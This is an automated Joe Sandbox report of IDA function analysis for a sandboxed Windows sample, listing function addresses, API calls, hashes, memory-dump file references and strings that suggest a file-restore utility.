Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: d329c136ab1fafd70d67518a5251a937d4956e0a4660da560bfd756196707ce6
Instruction ID: d15eb9a76dc104a92c8afb0b5b99091fdaadb7d170d26081ade6454bacb5be40
Opcode Fuzzy Hash: d329c136ab1fafd70d67518a5251a937d4956e0a4660da560bfd756196707ce6
Instruction Fuzzy Hash: 5801C832E017209BC720AB5A9816B5E73607F48724F15051BE810A7395DB7C5961CFDD

Function 00443100 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

Part of subcall function 00401710: GetWindowRect.USER32(?,?), ref: 00401722

CreateDIBSection.GDI32(00000000,00000028,00000000,00000000,00000000,00000000), ref: 004432AB

Part of subcall function 004069C0: SetRect.USER32(?,?,?,?,?), ref: 004069DB

SelectObject.GDI32(00000000,00000000), ref: 004432DB
DeleteObject.GDI32(?), ref: 004432E8

Part of subcall function 00406A10: IntersectRect.USER32(?,?,?), ref: 00406A23

Part of subcall function 004069A0: IsRectEmpty.USER32(?), ref: 004069AB

Strings

(, xrefs: 00443211

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Rect$Object$CreateDeleteEmptyIntersectSectionSelectWindow
String ID: (
API String ID: 110054353-3887548279
Opcode ID: 544210cf4082e1109ab465c5b122abd12e57a2b80f302681f8839afd0eafc22b
Instruction ID: 8e7184c15ee8eb906f3ba3d9a000e42551a7d771a3cac3a045a4213eb7509ce6
Opcode Fuzzy Hash: 544210cf4082e1109ab465c5b122abd12e57a2b80f302681f8839afd0eafc22b
Instruction Fuzzy Hash: BF91D5719101289FDB04EFA9CC95BEEB7B5BF44308F10812DE506BB2A2DB786905CF58

Function 00448D90 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004019A0: SendMessageW.USER32(?,00001037,00000000,00000000), ref: 004019B7

Part of subcall function 00401970: SendMessageW.USER32(?,00001036,00000000,?), ref: 00401989

Part of subcall function 0044D760: GetLogicalDrives.KERNEL32 ref: 0044D779
Part of subcall function 0044D760: GetDriveTypeW.KERNEL32(?), ref: 0044D7FA
Part of subcall function 0044D760: GetVolumeInformationW.KERNEL32(?,?,00000100,00000000,00000000,00000000,?,00000200), ref: 0044D854
Part of subcall function 0044D760: wsprintfW.USER32 ref: 0044D87C

lstrlenW.KERNEL32(00000000,87E7D08C), ref: 00448F39
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044903E
std::bad_exception::~bad_exception.LIBCMTD ref: 004490BC

Part of subcall function 004018B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004018C7

Strings

Folder, xrefs: 00448E21

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: MessageSend$ProcessorVirtual$Concurrency::DriveDrivesInformationLogicalRootRoot::TypeVolumelstrlenstd::bad_exception::~bad_exceptionwsprintf
String ID: Folder
API String ID: 610369107-3943566587
Opcode ID: ffa6add504babb1ee5bfa2d62bbb054a6298d90051a7f5204538e381ff6cb0ad
Instruction ID: 8f9c8028fcf9b677cf2ed20ef18823d25f4213cc4b77b8c16d83747140b88810
Opcode Fuzzy Hash: ffa6add504babb1ee5bfa2d62bbb054a6298d90051a7f5204538e381ff6cb0ad
Instruction Fuzzy Hash: 4F912F70A001189BDB24DF59CDA1BEDB7B1AF49308F1081AEE50AB72D1CB746E85CF59

Function 00445260 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00445298
__wsplitpath_s.LIBCMT ref: 004452CD
_DebugHeapAllocator.LIBCPMTD ref: 00445326

Strings

8VD, xrefs: 00445291, 00445294

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocatorDebugHeap$__wsplitpath_s
String ID: 8VD
API String ID: 3144221587-1214845537
Opcode ID: e6577c6f21a67a0b912469b04de2fae0ffe9adb2cc82dd71664405491e833a1e
Instruction ID: a52e2004bcc0c66e4e9b8b9a0d3b77a72b3166921fd4c28a595a62ab77aa5786
Opcode Fuzzy Hash: e6577c6f21a67a0b912469b04de2fae0ffe9adb2cc82dd71664405491e833a1e
Instruction Fuzzy Hash: 60515D70901119ABDB14EB95DD99BEEB7B4AF14304F1041EEA10AB32D2DB386F84CF59

Function 0044E3A0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 00401940: SendMessageW.USER32(?,0000100C,?), ref: 00401963

Part of subcall function 0040BEB5: _memset.LIBCMT ref: 0040BEC8
Part of subcall function 0040BEB5: SendMessageW.USER32(?,00001073,?,?), ref: 0040BEF1

_memset.LIBCMT ref: 0044E4A5

Part of subcall function 00413DBC: __EH_prolog3.LIBCMT ref: 00413DC3
Part of subcall function 00413DBC: GetWindowTextW.USER32(?,?,?), ref: 00413DD9

Strings

The disk letter of source drive and letter of destination path are the same., xrefs: 0044E43C
@, xrefs: 0044E4DE
Error, xrefs: 0044E437

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: MessageSend_memset$H_prolog3TextWindow
String ID: @$Error$The disk letter of source drive and letter of destination path are the same.
API String ID: 761542575-1158511288
Opcode ID: d7b59ffb31efee85e9ed2ea0f9db1ea48099e0d1621588e7f585fb18f02982da
Instruction ID: 2b07a549161c8c1fbd4a8a8b903074789d736deb5111c2a417dc7353dc8078ee
Opcode Fuzzy Hash: d7b59ffb31efee85e9ed2ea0f9db1ea48099e0d1621588e7f585fb18f02982da
Instruction Fuzzy Hash: 64416F30A041589BDB54EB15CC91BE9B3B6EF44308F0082EAA68DA72D1DBB45EC4CF59

Function 0045874A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 0045877E

Part of subcall function 0040855C: _malloc.LIBCMT ref: 0040857A

_DebugHeapAllocator.LIBCPMTD ref: 004587E0
_DebugHeapAllocator.LIBCPMTD ref: 0045897B
GetFileAttributesExW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000001,?,?,87E7D08C), ref: 004589C4
_DebugHeapAllocator.LIBCPMTD ref: 00458A38

Strings

D#I, xrefs: 0045883E
Folder, xrefs: 00458890

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocatorDebugHeap$AttributesFile_malloc
String ID: D#I$Folder
API String ID: 2285631665-2555058395
Opcode ID: 13c83cc43afcc16c58f21a4b5768036b4f274cff66e87458bc1bc25261d13994
Instruction ID: 9ba8a958829c7f8bbdb6b18f4f5cc8756d13dde546d66829dbf9507ceb7b3628
Opcode Fuzzy Hash: 13c83cc43afcc16c58f21a4b5768036b4f274cff66e87458bc1bc25261d13994
Instruction Fuzzy Hash: 7D310570A01218ABEB64DB54CC51BDDB774AF44308F1081EAE5097B2D2DFB86E84CF99

Function 0044D280 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

GetExitCodeThread.KERNEL32(?,00000000), ref: 0044D2AE
CloseHandle.KERNEL32(?), ref: 0044D2CB

Part of subcall function 00403DE0: KillTimer.USER32(?,?), ref: 00403DF2

wsprintfW.USER32 ref: 0044D363

Strings

Restoring file(s), %d.%d%% complete, xrefs: 0044D357

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
